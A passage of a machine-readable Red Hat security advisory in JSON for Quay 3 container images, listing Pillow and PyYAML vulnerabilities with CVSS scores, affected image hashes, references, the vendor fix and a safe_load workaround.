"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "python-pillow: uncontrolled resource consumption in FpxImagePlugin.py" }, { "cve": "CVE-2019-20477", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2020-02-21T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1806005" } ], "notes": [ { "category": "description", "text": "A vulnerability was discovered in the PyYAML library, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. 
An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/apply constructor.", "title": "Vulnerability description" }, { "category": "summary", "text": "PyYAML: command execution through python/object/apply constructor in FullLoader", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue did not affect the versions of PyYAML as shipped with Red Hat Enterprise Linux 7, and 8 as they did not include the class FullLoader, which contains this vulnerability.\n\nThe PyYAML library that is provided in the Red Hat OpenStack repositories is vulnerable. However, because there are no instances where this library is used in a way which exposes the vulnerability, the impact to OpenStack products has been reduced to \u0027low\u0027 and Red Hat will not be providing a fix at this time. Any updates will be through RHEL channels.\n\nRed Hat Quay 3.2 uses the vulnerable load function, but only to parse the Nginx configuration file, which only contains trusted data.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-20477" }, { "category": "external", "summary": "RHBZ#1806005", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1806005" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-20477", "url": "https://www.cve.org/CVERecord?id=CVE-2019-20477" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-20477", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20477" } ], "release_date": "2019-11-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" }, { "category": "workaround", "details": "Use `yaml.safe_load` or the SafeLoader loader when you parse untrusted input.", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "PyYAML: command execution through python/object/apply constructor in FullLoader" }, { "cve": "CVE-2020-5310", "cwe": { "id": "CWE-122", "name": "Heap-based Buffer Overflow" }, "discovery_date": "2020-01-03T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789538" } ], "notes": [ { "category": "description", "text": "libImaging/TiffDecode.c in Pillow before 6.2.2 has a TIFF decoding integer overflow, related to realloc.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue did not affect the versions of python-pillow as shipped with Red Hat Enterprise Linux 5, 6, 7, and 8 as they did not include support for tiled TIFF images, where the flaw lies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ 
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-5310" }, { "category": "external", "summary": "RHBZ#1789538", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789538" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-5310", "url": "https://www.cve.org/CVERecord?id=CVE-2020-5310" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5310", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5310" } ], "release_date": "2020-01-03T00:00:00+00:00", "remediations": [ { "category": 
"vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode" }, { "cve": "CVE-2020-5311", "cwe": { "id": "CWE-787", "name": "Out-of-bounds Write" }, "discovery_date": "2020-01-03T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789535" } ], "notes": [ { "category": "description", "text": "An out-of-bounds write flaw 
was discovered in python-pillow in the way SGI RLE images are decoded. An application that uses python-pillow to decode untrusted images may be vulnerable to this flaw, which can allow an attacker to crash the application or potentially execute code on the system.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue did not affect the versions of python-pillow and python-imaging as shipped with Red Hat Enterprise Linux 6, and 7 as they did not include the SGI RLE image decoder, where the flaw lies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", 
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-5311" }, { "category": "external", "summary": "RHBZ#1789535", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789535" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-5311", "url": "https://www.cve.org/CVERecord?id=CVE-2020-5311" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5311", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5311" } ], "release_date": "2020-01-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", 
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c" }, { "cve": "CVE-2020-5312", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "discovery_date": "2020-01-03T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789533" } ], "notes": [ { "category": "description", "text": "A flaw was discovered in python-pillow where it does not properly restrict operations within the bounds of a memory buffer when decoding PCX images. 
An application that uses python-pillow to decode untrusted images may be vulnerable to this flaw, which can allow an attacker to crash the application or potentially execute code on the system.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", 